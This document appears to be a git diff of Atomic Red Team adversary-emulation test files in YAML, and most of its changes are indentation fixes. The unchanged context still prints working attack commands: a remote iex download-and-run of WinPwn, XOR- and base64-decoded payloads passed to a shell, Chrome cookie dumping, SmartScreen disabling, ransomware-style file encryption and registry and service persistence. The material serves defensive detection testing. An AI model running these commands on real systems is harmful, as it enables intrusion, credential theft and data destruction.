-     if (Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\ExcelVBAaddin.xlam") {exit 0} else {exit 1}
+      if (Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\ExcelVBAaddin.xlam") {exit 0} else {exit 1}
    get_prereq_command: |-
      New-Item -Type Directory "PathToAtomicsFolder\T1137.006\bin\Addins\" -Force | Out-Null
      Invoke-Webrequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.006/bin/Addins/ExcelVBAaddin.xlam" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.006\bin\Addins\ExcelVBAaddin.xlam"
@@ -178,7 +178,7 @@ atomic_tests:
    Creates a PowerPoint VBA Add-in file (PPAM) which runs automatically when PowerPoint is started
    The sample PPA provided launches the notepad as a proof-of-concept for persistent execution from Office.
  supported_platforms:
-    - windows
+  - windows
  dependencies:
  - description: |
      Microsoft Excel must be installed
@@ -192,7 +192,7 @@ atomic_tests:
      Write-Host "You will need to install Microsoft PowerPoint manually to meet this requirement"
  - description: PPAM file must exist on disk at specified location
    prereq_command: |
-     if (Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\PptVBAaddin.ppam") {exit 0} else {exit 1}
+      if (Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\PptVBAaddin.ppam") {exit 0} else {exit 1}
    get_prereq_command: |-
      New-Item -Type Directory "PathToAtomicsFolder\T1137.006\bin\Addins\" -Force | Out-Null
      Invoke-Webrequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.006/bin/Addins/PptVBAaddin.ppam" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.006\bin\Addins\PptVBAaddin.ppam"
@@ -207,9 +207,9 @@ atomic_tests:
      New-ItemProperty $ExcelRegPath "Path" -value "notepad.ppam" -propertyType string | Out-Null
      Stop-Process -Name "PowerPnt" -ErrorAction Ignore
      Start-Process "PowerPnt"
-    cleanup_command: |
+    cleanup_command: |-
      $ver = (New-Object -COMObject "PowerPoint.Application").version
      Remove-Item "HKCU:\Software\Microsoft\Office\$Ver\PowerPoint\AddIns\notepad" -ErrorAction Ignore
      Stop-Process -Name "notepad","PowerPnt" -ErrorAction Ignore
      Start-Sleep 3
-      Remove-Item "$env:APPDATA\Microsoft\AddIns\notepad.ppam"  -ErrorAction Ignore
+      Remove-Item "$env:APPDATA\Microsoft\AddIns\notepad.ppam"  -ErrorAction Ignore
@@ -47,7 +47,7 @@ atomic_tests:
  description: |
    Use Python to decode a base64-encoded text string and echo it to the console
  supported_platforms:
-  - linux 
+  - linux
  - macos
  input_arguments:
    message:
@@ -297,8 +297,6 @@ atomic_tests:
    get_prereq_command: echo "Install Python3"
  executor:
    command: "python3 -c 'import base64; import subprocess; xor_decrypt = lambda text, key: \"\".join([chr(c ^ ord(k)) for c, k in zip(base64.b64decode(text.encode()), key)]); command = \"#{encrypted_command}\"; key = \"#{xor_key}\"; exec = xor_decrypt(command, key); subprocess.call(exec, shell=True)'"
-    cleanup_command: 
+    cleanup_command:
    name: bash
    elevation_required: false
-      
-
@@ -69,7 +69,7 @@ atomic_tests:

  description: |-
    This test loads an unpacked extension in Google Chrome with the `--load-extension` parameter. This technique was previously used by the Grandoreiro malware to load a malicious extension that would capture the browsing history, steal cookies and other user information. Other malwares also leverage this technique to hijack searches, steal passwords, inject ads, and more.
-    
+
    References:
    https://attack.mitre.org/techniques/T1176/
    https://securityintelligence.com/posts/grandoreiro-malware-now-targeting-banks-in-spain/
@@ -82,7 +82,7 @@ atomic_tests:
      type: string
      default: $env:TEMP
  executor:
-    command: |-
+    command: |2-

      # Chromium
      $chromium =  "https://commondatastorage.googleapis.com/chromium-browser-snapshots/Win_x64/1153778/chrome-win.zip"
@@ -96,7 +96,6 @@ atomic_tests:
      Invoke-WebRequest -URI $chromium -OutFile "#{working_dir}\chrome.zip"
      Invoke-WebRequest -URI $extension -OutFile "#{working_dir}\extension.zip"

-
      Expand-Archive chrome.zip -DestinationPath "#{working_dir}" -Force
      Expand-Archive extension.zip -Force

@@ -138,14 +138,14 @@ atomic_tests:
  supported_platforms:
  - iaas:aws
  dependencies:
-    - description: |
-        Check if ~/.aws/credentials file has a default stanza is configured
-      prereq_command: |
-        cat ~/.aws/credentials | grep "default"
-      get_prereq_command: |
-        echo Please install the aws-cli and configure your AWS defult profile using: aws configure
+  - description: |
+      Check if ~/.aws/credentials file has a default stanza is configured
+    prereq_command: |
+      cat ~/.aws/credentials | grep "default"
+    get_prereq_command: |
+      echo Please install the aws-cli and configure your AWS defult profile using: aws configure
  executor:
    command: |
-       aws iam get-account-password-policy
+      aws iam get-account-password-policy
    name: sh
    elevation_required: false
@@ -19,4 +19,4 @@ atomic_tests:
      stop-process -Name "Calculatorapp" -Force 
      dismount-diskimage -ImagePath "$env:TEMP\qbot-test.iso"
    name: powershell
-    elevation_required: true
+    elevation_required: true
@@ -86,5 +86,5 @@ atomic_tests:
      Remove-Item $dc_output_file -ErrorAction Ignore

      Write-Host "End of DCShadow"
-    cleanup_command: |
+    cleanup_command: |-
      Stop-Process -Name "mimikatz" -Force -ErrorAction Ignore
@@ -128,7 +128,6 @@ atomic_tests:
      #{regsvr32path}\#{regsvr32name} /s #{dll_file}
    cleanup_command: |
      #{regsvr32path}\#{regsvr32name} /U /s #{dll_file}
-
 - name: Regsvr32 Silent DLL Install Call DllRegisterServer
  auto_generated_guid: 9d71c492-ea2e-4c08-af16-c6994cdf029f
  description: Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer.
@@ -340,7 +340,7 @@ atomic_tests:
    [LOLBAS](https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/)
    [BishopFox](https://bishopfox.com/blog/edr-bypass-with-lolbins)
  supported_platforms:
-    - windows
+  - windows
  input_arguments:
    dest_path:
      description: Directory to copy files into
@@ -355,7 +355,7 @@ atomic_tests:
      Copy-Item -Path "C:\windows\system32\customshellhost.exe" -Destination "#{dest_path}\customshellhost.exe" -Force
      Copy-Item -Path "C:\windows\system32\calc.exe" -Destination "#{dest_path}\explorer.exe" -Force
      #{dest_path}\customshellhost.exe
-    cleanup_command: | 
+    cleanup_command: |
      Remove-Item -Path #{dest_path} -Recurse -Force
    name: powershell
    elevation_required: true
@@ -66,8 +66,7 @@ atomic_tests:
      Invoke-WebRequest -OutFile C:\Users\$env:username\Downloads\GoToAssist.exe "https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1"
      $file1 = "C:\Users\" + $env:username + "\Downloads\GoToAssist.exe"
      Start-Process $file1 /S;
-    cleanup_command: 
-      try{"$PathToAtomicsFolder/T1219/bin/GoToCleanup.ps1"} catch{}
+    cleanup_command: try{"$PathToAtomicsFolder/T1219/bin/GoToCleanup.ps1"} catch{}
    name: powershell
    elevation_required: true
 - name: ScreenConnect Application Download and Install on Windows
@@ -4,7 +4,7 @@ atomic_tests:
 - name: LockBit Black - Modify Group policy settings -cmd
  auto_generated_guid: 9ab80952-74ee-43da-a98c-1e740a985f28
  description: |
-     An adversary can modify the group policy settings.
+    An adversary can modify the group policy settings.
  supported_platforms:
  - windows
  executor:
@@ -27,7 +27,7 @@ atomic_tests:
 - name: LockBit Black - Modify Group policy settings -Powershell
  auto_generated_guid: b51eae65-5441-4789-b8e8-64783c26c1d1
  description: |
-     An adversary modifies group policy settings
+    An adversary modifies group policy settings
  supported_platforms:
  - windows
  executor:
@@ -39,11 +39,11 @@ atomic_tests:
      New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name EnableSmartScreen -PropertyType DWord -Value 0 -Force
      New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name ShellSmartScreenLevel -Force
    cleanup_command: |
-       Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeDC -Force -ErrorAction Ignore
-       Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffsetDC -Force -ErrorAction Ignore 
-       Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTime -Force -ErrorAction Ignore
-       Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffset -Force -ErrorAction Ignore
-       Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name EnableSmartScreen -Force -ErrorAction Ignore
-       Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name ShellSmartScreenLevel -Force -ErrorAction Ignore
+      Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeDC -Force -ErrorAction Ignore
+      Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffsetDC -Force -ErrorAction Ignore 
+      Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTime -Force -ErrorAction Ignore
+      Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffset -Force -ErrorAction Ignore
+      Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name EnableSmartScreen -Force -ErrorAction Ignore
+      Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name ShellSmartScreenLevel -Force -ErrorAction Ignore
    name: powershell
    elevation_required: true
@@ -105,7 +105,7 @@ atomic_tests:
      if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
    get_prereq_command: |
      echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"
-  - description: | 
+  - description: |
      Check if user is logged in 
    prereq_command: |
      gcloud config get-value account
@@ -116,12 +116,12 @@ atomic_tests:
    prereq_command: |
      terraform version
    get_prereq_command: |
-        echo Please install the terraform.
+      echo Please install the terraform.
  - description: |
      Create dependency resources using terraform
    prereq_command: |
      stat "$PathToAtomicsFolder/T1485/src/T1485-4/terraform.tfstate"
-    get_prereq_command: |
+    get_prereq_command: |-
      cd "$PathToAtomicsFolder/T1485/src/T1485-4/"
      terraform init
-      terraform apply -auto-approve
+      terraform apply -auto-approve
@@ -88,8 +88,7 @@ atomic_tests:
      type: path
      default: /tmp/passwd
    root_input_file_path:
-      description: path to the file that you want to be encrypted if you are root
-        user
+      description: path to the file that you want to be encrypted if you are root user
      type: path
      default: /etc/passwd
    user_input_file_path:
@@ -179,7 +178,6 @@ atomic_tests:
      echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt
    cleanup_command: |
      del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1
-
 - name: Encrypt files using 7z utility - macOS
  auto_generated_guid: 645f0f5a-ef09-48d8-b9bc-f0e24c642d72
  description: |
@@ -215,8 +213,8 @@ atomic_tests:
    cleanup_command: |
      rm #{encrypted_file_name}
    name: sh
-    elevation_required: false  
-    
+    elevation_required: false
+
 - name: Encrypt files using openssl utility - macOS
  auto_generated_guid: 1a01f6b8-b1e8-418e-bbe3-78a6f822759e
  description: |
@@ -227,7 +225,7 @@ atomic_tests:
    encryption_option:
      description: Specifiy the required encryption option
      type: string
-      default: -pbkdf2  
+      default: -pbkdf2
    input_file_path:
      description: Path to the file that you want to encrypt
      type: path
@@ -235,22 +233,20 @@ atomic_tests:
    output_file_name:
      description: Path to the file that you want to encrypt
      type: string
-      default: ARTFile      
+      default: ARTFile
  executor:
    command: |
      openssl enc #{encryption_option} -in #{input_file_path} -out #{output_file_name}
    cleanup_command: |
      rm #{output_file_name}
    name: sh
-    elevation_required: false     
+    elevation_required: false

 - name: Data Encrypted with GPG4Win
  auto_generated_guid: 4541e2c2-33c8-44b1-be79-9161440f1718
-  description:
-      Gpg4win is a Windows tool (also called Kleopatra which is the preferred certificate manager) that uses email and file encryption packages for symmetric encryption. 
-      It is used by attackers to encrypt disks. User will need to add pass phrase to encrypt file as automation is not allowed under newer versions.
+  description: Gpg4win is a Windows tool (also called Kleopatra which is the preferred certificate manager) that uses email and file encryption packages for symmetric encryption. It is used by attackers to encrypt disks. User will need to add pass phrase to encrypt file as automation is not allowed under newer versions.
  supported_platforms:
-    - windows
+  - windows
  input_arguments:
    GPG_Exe_Location:
      description: Path of the GPG program
@@ -261,18 +257,18 @@ atomic_tests:
      type: path
      default: '$env:temp\test.txt'
  dependencies:
-    - description: |
-        GPG must exist at (#{GPG_Exe_Location})
-      prereq_command: |
-        if (test-path '#{GPG_Exe_Location}'){exit 0} else {exit 1}
-      get_prereq_command: |
-        New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-        invoke-webrequest "https://files.gpg4win.org/gpg4win-4.1.0.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\gpginstall.exe"
-        cmd /c "PathToAtomicsFolder\..\ExternalPayloads\gpginstall.exe" /S
+  - description: |
+      GPG must exist at (#{GPG_Exe_Location})
+    prereq_command: |
+      if (test-path '#{GPG_Exe_Location}'){exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      invoke-webrequest "https://files.gpg4win.org/gpg4win-4.1.0.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\gpginstall.exe"
+      cmd /c "PathToAtomicsFolder\..\ExternalPayloads\gpginstall.exe" /S
  executor:
    name: powershell
    elevation_required: false
    command: |
      cmd /c '#{GPG_Exe_Location}' -c '#{File_to_Encrypt_Location}'
-    cleanup_command: |
+    cleanup_command: |-
      remove-item '#{File_to_Encrypt_Location}.gpg' -force -erroraction silentlycontinue | out-null
@@ -137,8 +137,7 @@ atomic_tests:
    elevation_required: true
 - name: Windows - vssadmin Resize Shadowstorage Volume
  auto_generated_guid: da558b07-69ae-41b9-b9d4-4d98154a7049
-  description: 
-    Adversaries generally try to Resize Shadowstorage Volume using vssadmin.exe to avoid the shadow volumes being made again. This technique is typically found used by adversaries during a ransomware event and a precursor to deleting the shadowstorage.
+  description: Adversaries generally try to Resize Shadowstorage Volume using vssadmin.exe to avoid the shadow volumes being made again. This technique is typically found used by adversaries during a ransomware event and a precursor to deleting the shadowstorage.
  supported_platforms:
  - windows
  executor:
@@ -13,4 +13,3 @@ atomic_tests:
    command: |
      yes > /dev/null
    name: sh
-
@@ -1,4 +1,3 @@
---
 attack_technique: T1497.001
 display_name: 'Virtualization/Sandbox Evasion: System Checks'
 atomic_tests:
@@ -8,11 +7,11 @@ atomic_tests:
    systemd-detect-virt detects execution in a virtualized environment.
    At boot, dmesg stores a log if a hypervisor is detected.
  supported_platforms:
-    - linux
+  - linux
  executor:
    name: sh
-    elevation_required: true 
-    command: | 
+    elevation_required: true
+    command: |
      if (systemd-detect-virt) then echo "Virtualization Environment detected"; fi;
      if (sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo "Virtualization Environment detected"; fi;
 - name: Detect Virtualization Environment (FreeBSD)
@@ -21,22 +20,22 @@ atomic_tests:
    Detects execution in a virtualized environment.
    At boot, dmesg stores a log if a hypervisor is detected.
  supported_platforms:
-    - linux
+  - linux
  executor:
    name: sh
-    elevation_required: true 
-    command: | 
+    elevation_required: true
+    command: |
      if [ "$(sysctl -n hw.hv_vendor)" != "" ]; then echo "Virtualization Environment detected"; fi
 - name: Detect Virtualization Environment (Windows)
  auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d
  description: |
    Windows Management Instrumentation(WMI) objects contains system information which helps to detect virtualization. This command will specifically attempt to get the CurrentTemperature value from this object and will check to see if the attempt results in an error that contains the word supported. This is meant to find the result of Not supported, which is the result if run in a virtual machine
  supported_platforms:
-    - windows
+  - windows
  executor:
    name: powershell
-    elevation_required: false 
-    command: | 
+    elevation_required: false
+    command: |
      $error.clear()
      Get-WmiObject -Query "SELECT * FROM MSAcpi_ThermalZoneTemperature" -ErrorAction SilentlyContinue
      if($error) {echo "Virtualization Environment detected"}
@@ -47,22 +46,22 @@ atomic_tests:
  description: |
    ioreg contains registry entries for all the device drivers in the system. If it's a virtual machine, one of the device manufacturer will be a Virtualization Software.
  supported_platforms:
-    - macos
+  - macos
  executor:
    name: sh
-    elevation_required: false 
-    command: | 
+    elevation_required: false
+    command: |
      if (ioreg -l | grep -e Manufacturer -e 'Vendor Name' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo 'Virtualization Environment detected'; fi;
 - name: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)
  auto_generated_guid: 4a41089a-48e0-47aa-82cb-5b81a463bc78
  description: |
    Windows Management Instrumentation(WMI) objects contain system information which helps to detect virtualization. This test will get the model and manufacturer of the machine to determine if it is a virtual machine, such as through VMware or VirtualBox. 
  supported_platforms:
-    - windows
+  - windows
  executor:
    name: powershell
-    elevation_required: false 
-    command: | 
+    elevation_required: false
+    command: |-
      $Manufacturer = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty "Manufacturer"
      $Model = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty "Model"
      if((($Manufacturer.ToLower() -eq "microsoft corporation") -and ($Model.ToLower().contains("virtual"))) -or ($Manufacturer.ToLower().contains("vmware")) -or ($Model.ToLower() -eq "virtualbox")) {write-host "Virtualization environment detected!"} else {write-host "No virtualization environment detected!"}
@@ -121,7 +121,7 @@ atomic_tests:
    command: |
      powershell Get-CimInstance -Namespace root/securityCenter2 -classname antivirusproduct
      powershell Get-WmiObject -Namespace root\securitycenter2 -Class antivirusproduct
-    name: command_prompt 
+    name: command_prompt
    elevation_required: true
 - name: Security Software Discovery - Windows Defender Enumeration
  auto_generated_guid: d3415a0e-66ef-429b-acf4-a768876954f6
@@ -135,7 +135,7 @@ atomic_tests:
      Get-Service WinDefend #check the service state of Windows Defender
      Get-MpComputerStatus #provides the current status of security solution elements, including Anti-Spyware, Antivirus, LoavProtection, Real-time protection, etc
      Get-MpThreat #threats details that have been detected using MS Defender
-    name: powershell 
+    name: powershell
    elevation_required: true
 - name: Security Software Discovery - Windows Firewall Enumeration
  auto_generated_guid: 9dca5a1d-f78c-4a8d-accb-d6de67cfed6b
@@ -150,5 +150,5 @@ atomic_tests:
      Get-NetFirewallProfile | Format-Table Name, Enabled
      Get-NetFirewallSetting
      Get-NetFirewallRule | select DisplayName, Enabled, Description
-    name: powershell 
-    elevation_required: true
+    name: powershell
+    elevation_required: true
@@ -25,13 +25,13 @@ atomic_tests:
      Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize
      Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize
    name: powershell
-    
+
 - name: Find and Display Safari Browser Version
  auto_generated_guid: 103d6533-fd2a-4d08-976a-4a598565280f
  description: |
    Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors
  supported_platforms:
-    - macos
+  - macos
  executor:
    name: sh
    elevation_required: false
@@ -70,4 +70,4 @@ atomic_tests:
      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
      powerSQL -noninteractive -consoleoutput
-    name: powershell
+    name: powershell
@@ -85,10 +85,10 @@ atomic_tests:
    If successful, this test will output a list of cookies.

    Note: Chrome processes will be killed during this test.
-  
+
    See https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e
  supported_platforms:
-  - macos 
+  - macos
  dependency_executor_name: bash
  dependencies:
  - description: 'Install Go'
@@ -114,4 +114,4 @@ atomic_tests:
      /tmp/WhiteChocolateMacademiaNut/chocolate -d cookies -p 1337
    cleanup_command: rm -rf /tmp/WhiteChocolateMacademiaNut
    name: bash
-    elevation_required: false
+    elevation_required: false
@@ -150,7 +150,7 @@ atomic_tests:
      echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002
      systemctl daemon-reload
      systemctl restart T1543.002
-    cleanup_command: |
+    cleanup_command: |-
      systemctl stop T1543.002
      systemctl disable T1543.002
      rm -rf /etc/init.d/T1543.002
@@ -17,8 +17,7 @@ atomic_tests:
    command: |
      sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\""
      sc start Fax
-    cleanup_command:
-      sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul 2>&1
+    cleanup_command: sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul 2>&1
 - name: Service Installation CMD
  auto_generated_guid: 981e2942-e433-44e9-afc1-8c957a1496b6
  description: |
@@ -171,6 +170,6 @@ atomic_tests:
    command: |
      sc.exe \\#{remote_host} create #{service_name} binPath= "#{binary_path}" start=#{startup_type} type=#{service_type}
      sc.exe \\#{remote_host} start #{service_name}
-    cleanup_command: |
+    cleanup_command: |-
      sc.exe \\#{remote_host} stop #{service_name} >nul 2>&1
-      sc.exe \\#{remote_host} delete #{service_name} >nul 2>&1
+      sc.exe \\#{remote_host} delete #{service_name} >nul 2>&1
@@ -30,7 +30,7 @@ atomic_tests:
    command: |
      sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}
      sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}
-    cleanup_command: |
+    cleanup_command: |-
      sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}
      sudo rm /Library/LaunchDaemons/#{plist_filename}
      sudo rm /tmp/T1543_004_atomicredteam.txt
@@ -126,5 +126,5 @@ atomic_tests:
      useradd --create-home --shell /bin/bash art
      su --login art
      echo 'echo "Atomic Red Team was here... T1546.004" >> $HOME/art.txt' >> $HOME/.bash_logout
-    cleanup_command: |
+    cleanup_command: |-
      userdel -fr art
@@ -1,7 +1,6 @@
 attack_technique: T1546
 display_name: Event Triggered Execution
 atomic_tests:
-
 - name: Persistence with Custom AutodialDLL
  auto_generated_guid: aca9ae16-7425-4b6d-8c30-cad306fdbd5b
  description: |
@@ -22,8 +21,7 @@ atomic_tests:
  executor:
    command: |
      Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters -Name AutodialDLL -Value PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll
-    cleanup_command:
-      Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters -Name AutodialDLL -Value  $env:windir\system32\rasadhlp.dll
+    cleanup_command: Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters -Name AutodialDLL -Value  $env:windir\system32\rasadhlp.dll
    name: powershell
    elevation_required: true
 - name: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)
@@ -97,28 +95,27 @@ atomic_tests:
  executor:
    name: powershell
    elevation_required: true
-    command: |
-       # Set the remote computer name and credentials
-        $RemoteComputer = "#{dest}"
-        $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
-        $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+    command: |-
+      # Set the remote computer name and credentials
+       $RemoteComputer = "#{dest}"
+       $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+       $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword

-        # Create a CIM session
-        $CimSession = New-CimSession -ComputerName $RemoteComputer -Credential $Credential
+       # Create a CIM session
+       $CimSession = New-CimSession -ComputerName $RemoteComputer -Credential $Credential

-        # Define the process you want to start
-        $ProcessToStart = "#{process}"
+       # Define the process you want to start
+       $ProcessToStart = "#{process}"

-        # Invoke the Create method on the Win32_Process class to start the process
-        $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $ProcessToStart}
+       # Invoke the Create method on the Win32_Process class to start the process
+       $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $ProcessToStart}

-        # Check the result
-        if ($Result.ReturnValue -eq 0) {
-            Write-Host "Process started successfully with Process ID: $($Result.ProcessId)"
-        } else {
-            Write-Host "Failed to start the process. Error code: $($Result.ReturnValue)"
-        }
-
-        # Clean up the CIM session
-        Remove-CimSession -CimSession $CimSession 
+       # Check the result
+       if ($Result.ReturnValue -eq 0) {
+           Write-Host "Process started successfully with Process ID: $($Result.ProcessId)"
+       } else {
+           Write-Host "Failed to start the process. Error code: $($Result.ReturnValue)"
+       }

+       # Clean up the CIM session
+       Remove-CimSession -CimSession $CimSession
@@ -107,7 +107,7 @@ atomic_tests:
  auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
  description: |
    bat files can be placed in and executed from the startup folder to maintain persistance
-    
+
    Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
    folder and will also run when the computer is restarted and the user logs in.
  supported_platforms:
@@ -55,4 +55,4 @@ atomic_tests:
      rm -force C:\Users\Public\AtomicTest.dll
      net start w32time
    name: powershell
-    elevation_required: true
+    elevation_required: true
@@ -1,7 +1,6 @@
 attack_technique: T1547.004
 display_name: 'Boot or Logon Autostart Execution: Winlogon Helper DLL'
 atomic_tests:
-
 - name: Winlogon Shell Key Persistence - PowerShell
  auto_generated_guid: bf9f9d65-ee4d-4c3e-a843-777d04f19c38
  description: |
@@ -14,7 +14,7 @@ atomic_tests:
      Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' -Value "$oldvalue";
      $newvalue = "AtomicTest.dll";
      Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $newvalue
-      
+
    cleanup_command: |-
      $oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
      Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value "$oldvalue";
@@ -33,10 +33,10 @@ atomic_tests:
      Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' -Value "$oldvalue";
      $newvalue = "AtomicTest.dll";
      Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value $newvalue
-      
+
    cleanup_command: |-
      $oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
      Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value "$oldvalue";
      Remove-ItemProperty -Path  "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old';
    name: powershell
-    elevation_required: true
+    elevation_required: true
@@ -121,4 +121,4 @@ atomic_tests:
    cleanup_command: |
      $examplePath = Join-Path $env:windir "system32\Com"; $exampleName = "comadmin.dat"; $exampleFullPath = Join-Path $examplePath $exampleName; if (Test-Path $exampleFullPath) { Remove-Item $exampleFullPath -Force }
    name: powershell
-    elevation_required: true
+    elevation_required: true
@@ -1,4 +1,3 @@
---
 attack_technique: T1548.003
 display_name: "Abuse Elevation Control Mechanism: Sudo and Sudo Caching"

@@ -9,8 +8,8 @@ atomic_tests:
    Common Sudo enumeration methods.

  supported_platforms:
-    - macos
-    - linux
+  - macos
+  - linux

  executor:
    name: sh
@@ -19,14 +18,13 @@ atomic_tests:
      sudo -l      
      sudo cat /etc/sudoers
      sudo vim /etc/sudoers
-
 - name: Sudo usage (freebsd)
